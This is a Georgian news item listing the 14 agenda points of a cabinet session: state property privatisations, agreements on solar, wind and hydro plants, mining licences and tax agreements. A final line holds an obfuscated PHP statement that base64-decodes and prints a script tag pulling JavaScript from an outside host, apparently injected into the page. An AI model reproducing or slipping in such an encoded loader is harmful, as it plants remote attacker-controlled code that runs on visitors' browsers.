celsiusi
ავერსი საქკაბელი

დღეს 14 საათზე, მთავრობის სხდომა გაიმართება. მთავრობის ადმინისტრაციის მიერ გავრცელებული ინფორმაციით, მინისტრთა კაბინეტი დღის წესრიგით გათვალისწინებულ 14 საკითხს განიხილავს.

განსახილველი საკითხებიდან პირველ ცამეტ საკითხს ეკონომიკის მინისტრი ლევან დავითაშვილი წარადგენს, ხოლო მეთოთხმეტეს - ფინანსთა მინისტრი ლაშა ხუციშვილი.

დღის წესრიგით გათვალისწინებული საკითხებია:

1.  საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული უძრავი ქონების შპს „ვერტექსისათვის“ პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ“
 
2. საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული უძრავი ქონების შპს „ივერია პალასისათვის“ პირდაპირი მიყიდვის ფორმით პრივატიზების შესახებ“ საქართველოს მთავრობის 2018 წლის 6 მარტის №516 განკარგულებაში ცვლილების შეტანის თაობაზე”

3. საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული უძრავი ქონების შპს „პარვუსისათვის“ აღნაგობის უფლებით გადაცემაზე თანხმობის მიცემის შესახებ“

4. საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული უძრავი ქონების შპს „ჰპპ ინვესტისათვის“ აღნაგობის უფლებით გადაცემის თაობაზე თანხმობის მიცემის შესახებ”

5. საქართველოს მთავრობის განკარგულების პროექტი „სახელმწიფო საკუთრებაში არსებული უძრავი ქონების შპს „ამბასადორი ბათუმი აილენდისათვის“ აღნაგობის უფლებით გადაცემაზე თანხმობის გაცემის შესახებ“ საქართველოს მთავრობის 2021 წლის 27 სექტემბრის №1711 განკარგულებაში ცვლილების შეტანის თაობაზე“

6. საქართველოს მთავრობის განკარგულების პროექტი „საქართველოს მთავრობასა და შპს „კდ დეველოპმენტს“ შორის „ღვლევის ქარის ელექტროსადგურის“ შესახებ დასადები ხელშეკრულების თაობაზე”

7. საქართველოს მთავრობის განკარგულების პროექტი  „საქართველოს მთავრობასა და შპს „უსასრულო ენერგიას“ შორის „იმერეთი-1“ ელექტროსადგურის შესახებ 2015 წლის 16 ნოემბერს დადებულ ურთიერთგაგების მემორანდუმის ფარგლებში განსახორციელებელი ღონისძიებების შესახებ”

8. საქართველოს მთავრობის განკარგულების პროექტი „საქართველოს მთავრობას და შპს „კახეთის მზეს“ შორის „სახენისი 1 მზის ელექტროსადგურის“ შესახებ განსახორციელებელი ღონისძიებების შესახებ”

9. საქართველოს მთავრობის განკარგულების პროექტი „საქართველოს მთავრობას და შპს „კახეთის მზეს“ შორის „საგარეჯო 1 მზის ელექტროსადგურის“ შესახებ განსახორციელებელი ღონისძიებების შესახებ”

10. საქართველოს მთავრობის განკარგულების პროექტი „საქართველოს მთავრობას და შპს „საქართველოს მზის კომპანიას“ შორის „უდაბნოს მზის ელექტროსადგურის“ შესახებ განსახორციელებელი ღონისძიებების შესახებ”

11. საქართველოს მთავრობის განკარგულების პროექტი „საქართველოს მთავრობას და შპს „კახეთის მზეს“ შორის „გამარჯვების მზის ელექტროსადგურის“ შესახებ განსახორციელებელი ღონისძიებების შესახებ” 

12. საქართველოს მთავრობის განკარგულების პროექტი „სასარგებლო წიაღისეულის (სილიკომანგანუმის ქერქული ნარჩენების ტექნოგენური დანაგროვი) მოპოვების ლიცენზიის გაცემისათვის საწყისი სააუქციონო ფასის განსაზღვრისა და დამატებითი სალიცენზიო პირობის განსაზღვრაზე თანხმობის გაცემის შესახებ”

13. საქართველოს მთავრობის განკარგულების პროექტი „შპს „კევლიშვილების“ (ს/კ 438118582) სასარგებლო წიაღისეულის მოპოვების ლიცენზიისაგან გათავისუფლების თაობაზე”

14. საქართველოს მთავრობის განკარგულების პროექტი „საგადასახადო შეთანხმებების გაფორმების შესახებ”

323
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");